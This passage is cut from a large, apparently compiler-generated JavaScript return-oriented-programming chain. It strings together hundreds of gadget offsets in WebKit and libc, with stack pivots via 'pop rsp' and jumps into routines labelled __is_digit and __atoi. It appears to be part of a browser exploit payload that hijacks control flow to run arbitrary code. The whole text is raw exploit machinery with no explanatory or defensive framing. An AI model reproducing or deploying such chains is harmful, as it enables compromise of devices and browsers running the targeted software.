ropchain+346024, //L7019
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7019:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+346152, //L7021
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+346168, //L7022
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+346136, //L7020
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7020:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7021:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7022:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+346328, //L7026
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+346296, //L7024
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+346312, //L7025
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7023:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7024:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7025:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7026:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+346384, //L7028
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7028:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+346512, //L7030
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+346528, //L7031
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+346496, //L7029
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7029:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7030:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7031:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+346608, //L7032
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+346624, //L7033
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7032:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7033:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+346720, //L7035
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+346704, //L7034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7034:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7035:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L7037:
ropchain+346824, //L7036
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+180736, //__is_digit
//L7036:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+346952, //L7040
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+346936, //L7039
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7038:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7039:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7040:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+347008, //L7042
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7042:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+347136, //L7044
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+347152, //L7045
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+347120, //L7043
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7043:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7044:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7045:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+347264, //L7047
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+347312, //L7050
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+347280, //L7048
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7047:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7048:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7049:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7050:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+347424, //L7051+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+347416, //L7051
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L7051:
db([0, 0]); // 0x0
set_gadgets([
ropchain+347440, //L7051+24
ropchain+347904, //L7046
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+347496, //L7053
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L7052:
db([40, 0]); // 0x28
set_gadget(libc_base+759608,); //pop rax
//L7053:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L7055:
ropchain+347608, //L7054
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+185320, //__atoi
//L7054:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+347736, //L7058
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+347720, //L7057
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7056:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L7057:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7058:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+347800, //L7059
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7059:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7061:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+347880, //L7063
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7063:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+355680, //L7062
//L7046:
libc_base+764760, //pop rsi
ropchain+347944, //L7065
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7065:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7067:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+348064, //L7070
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+348048, //L7068
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7068:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7070:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+348144, //L7071
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+348160, //L7072
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7071:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7072:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+348320, //L7076
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+348288, //L7074
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+348304, //L7075
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7073:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7074:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7075:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7076:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+348376, //L7078
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7078:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+348504, //L7080
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+348520, //L7081
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+348488, //L7079
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7079:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7080:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7081:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+348680, //L7085
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+348648, //L7083
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+348664, //L7084
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7082:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7083:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7084:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7085:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+348736, //L7087
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7087:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+348864, //L7089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+348880, //L7090
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+348848, //L7088
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7088:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7089:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7090:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+349040, //L7094
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+349008, //L7092
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+349024, //L7093
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7091:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7092:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7093:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7094:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+349096, //L7096
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7096:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+349224, //L7098
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+349240, //L7099
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+349208, //L7097
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7097:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7098:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7099:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+349320, //L7100
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+349336, //L7101
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7100:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7101:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+349432, //L7103
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+349416, //L7102
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7102:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7103:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+349512, //L7104
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7104:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7105:
db([42, 0]); // 0x2a
set_gadget(libc_base+144605,); //pop rdi
//L7106:
db([42, 0]); // 0x2a
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+349656, //L7107
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+349688, //L7109
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+349672, //L7108
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7107:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7108:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7109:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+349856, //L7111
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+349872, //L7112
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+349840, //L7110
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7110:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7111:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7112:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+349984, //L7114
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+350032, //L7117
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+350000, //L7115
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7114:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7115:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7116:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7117:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+350144, //L7118+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+350136, //L7118
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L7118:
db([0, 0]); // 0x0
set_gadgets([
ropchain+350160, //L7118+24
ropchain+355680, //L7113
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7119:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7121:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+350296, //L7124
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+350280, //L7122
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7122:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7124:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+350456, //L7128
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+350408, //L7125
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+350424, //L7126
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7125:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7126:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7127:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L7128:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+350512, //L7129
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7129:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7131:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+350632, //L7132
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+350648, //L7134
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7132:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7134:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+350824, //L7137
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+350840, //L7138
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+350792, //L7135
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+350808, //L7136
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7135:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7136:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7137:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7138:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+350920, //L7139
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+350936, //L7140
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7139:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7140:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+351024, //L7141
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+351040, //L7143
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7141:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7143:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7144:
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L7146:
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+351200, //L7149
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+351184, //L7147
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7147:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7149:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+351376, //L7152
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+351392, //L7153
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+351344, //L7150
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+351360, //L7151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7150:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7151:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7152:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7153:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+351472, //L7154
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+351488, //L7155
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7154:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7155:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+351584, //L7157
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+351568, //L7156
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7156:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7157:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+351664, //L7158
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7158:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7159:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7160:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+351808, //L7161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+351840, //L7163
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+351824, //L7162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7161:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7162:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7163:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+352016, //L7165
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+352032, //L7166
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+352000, //L7164
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7164:
db([0, 0]); // 0x0
